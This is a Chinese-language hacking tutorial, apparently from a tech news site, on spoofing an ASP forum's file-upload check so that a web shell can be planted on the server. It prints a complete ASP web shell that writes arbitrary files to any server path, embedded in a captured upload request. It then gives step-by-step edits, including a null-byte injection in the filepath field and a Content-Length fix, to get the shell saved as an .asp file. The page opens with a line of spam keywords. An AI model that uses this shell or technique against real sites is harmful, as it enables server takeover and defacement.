自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

解析上傳漏洞欺騙技術(shù)

安全 黑客攻防
先我們要獲得客戶端和服務(wù)器之間傳遞的數(shù)據(jù),事先準(zhǔn)備好一個(gè)ASP木馬準(zhǔn)備上傳,當(dāng)然不可能成功,我們要的就是這中間我們向服務(wù)器提交的數(shù)據(jù)。一般用WsockExpert來獲得數(shù)據(jù),由于數(shù)據(jù)太多只能把關(guān)鍵部分發(fā)出來

實(shí)際上網(wǎng)絡(luò)中存在著很多的漏洞,通過這些漏洞的利用黑客就可能會入侵網(wǎng)站的服務(wù)器,取得管理員權(quán)限。其中不少的程序都存在著上傳漏洞,通過上傳漏洞黑客入侵者便可以上傳一個(gè)ASP木馬,然后通過上傳漏洞欺騙技術(shù)來達(dá)到自己入侵的目的。接下來本篇文章就講分析一下上傳漏洞欺騙的具體原理。

POST /bbs/upfile.asp HTTP/1.1

……. 省略了N多沒用信息

 

  1. Content-Length: 1792  
  2. Connection: Keep-Alive  
  3. Cache-Control: no-cache  
  4. Cookie: ASPSESSIONIDQQTDTATD=NLDNNHPDJEEHOFNFBAGPOJKN 
  5. -----------------------------7d52191850242  
  6. Content-Disposition: form-data; name="filepath" 
  7.  
  8. uploadFace  
  9. -----------------------------7d52191850242  
  10. Content-Disposition: form-data; name="act" 
  11.  
  12. upload  
  13. -----------------------------7d52191850242  
  14. Content-Disposition: form-data; name="file1"
  15. filename="E:\木馬\asp\shell.asp" 
  16. Content-Type: text/plain  
  17.  
  18. <% dim objFSO %>  
  19. <% dim fdata %>  
  20. <% dim objCountFile %>  
  21. <% on error resume next %>  
  22. <% Set objFSO = Server.CreateObject("Scripting.FileSystemObject") %>  
  23. <% if Trim(request("syfdpath"))<>"" then %>  
  24. <% fdata = request("cyfddata") %>  
  25. <% Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True) %>  
  26. <% objCountFile.Write fdata %>  
  27. <% if err =0 then %>  
  28. <% response.write "<font color=red><h2>成功!</h2><font>" %>  
  29. <% else %>  
  30. <% response.write "<font color=red><h1>失?。。?h1></font>" %>  
  31. <% end if %>  
  32. <% err.clear %>  
  33. <% end if %>  
  34. <% objCountFile.Close %>  
  35. <% Set objCountFile=Nothing %>  
  36. <% Set objFSO = Nothing %>  
  37. <% Response.write "<form action='' method=post>" %>  
  38. <% Response.write "保存留言<font color=red>如D:\web\x.asp</font>" %>  
  39. <% Response.Write "<input type=text name=syfdpath width=32 size=50>" %>  
  40. <% Response.Write "<br>" %>  
  41. <% Response.write "地址來自" %>  
  42. <% =server.mappath(Request.ServerVariables("SCRIPT_NAME")) %>  
  43. <% Response.write "<br>" %>  
  44. <% Response.write "你的留言:" %>  
  45. <% Response.write "<textarea name=cyfddata
  46. cols=80 rows=10 width=32></textarea>" %>  
  47. <% Response.write "<input type=submit value=sky!!>" %>  
  48. <% Response.write "</form>" %> 

-----------------------------7d52191850242

Content-Disposition: form-data; name="fname"

E:\木馬\asp\shell.asp

-----------------------------7d52191850242

Content-Disposition: form-data; name="Submit"

上傳
-----------------------------7d52191850242--

傳遞的信息我們獲取了,下面就來修改下達(dá)到上傳漏洞欺騙目的。主要修改一下幾點(diǎn):

1.Content-Disposition: form-data; name="file1"; filename="E:\木馬\asp\shell.asp"

2.Content-Disposition: form-data; name="fname"

E:\木馬\asp\shell.asp

3.最重要的地方是Content-Disposition: form-data; name="filepath"下面的值要修改下。我們修改成uploadFace\shell.asp后面怎么加一個(gè)空字符呢?用UltraEdit是個(gè)好方法,用16進(jìn)制編輯,(因?yàn)?\0'這個(gè)字符也占一個(gè)位置,所以我們先打入一空格,然后再在UltraEdit(用Ctrl+H轉(zhuǎn)換到16進(jìn)制模式下)里將就空格符的20改成00)。

4.還有一個(gè)地方也要修改,就是這句Content-Length: 1792表示提交數(shù)據(jù)的字符個(gè)數(shù)。

如果你修改了filepath的值那么這個(gè)長度1792也要變換,一個(gè)字母或者數(shù)字的長度就是1,不要忘記最后面那個(gè)空格那個(gè)也算1。

【編輯推薦】

  1. 親身體驗(yàn)MS07-029漏洞入侵
  2. 解析系統(tǒng)泄露密碼入侵攻擊
  3. 經(jīng)典后門實(shí)例之線程插入后門
  4. 經(jīng)典后門實(shí)例之?dāng)U展后門
  5. 通過數(shù)據(jù)庫下載漏洞發(fā)起網(wǎng)絡(luò)攻擊

 

責(zé)任編輯:張啟峰 來源: 安全在線
相關(guān)推薦

2013-04-01 10:12:39

2010-09-13 16:24:39

2011-04-18 13:33:07

2019-10-31 08:43:43

ICMPARP協(xié)議ARP欺騙

2009-12-17 10:14:14

2013-09-04 10:41:08

2011-07-13 13:43:30

2015-12-01 10:43:55

2009-12-28 12:16:54

2010-09-16 16:06:37

2012-04-12 16:05:50

2011-04-06 10:23:46

2009-07-15 20:44:17

2013-11-29 15:41:08

解析漏洞ApacheApache解析漏洞

2010-08-03 11:08:57

2018-10-29 07:13:45

2019-11-20 15:18:15

欺騙技術(shù)網(wǎng)絡(luò)安全基礎(chǔ)設(shè)施安全

2011-04-06 10:31:53

2020-11-18 09:43:29

人臉識別AI人工智能

2013-06-25 10:11:18

點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號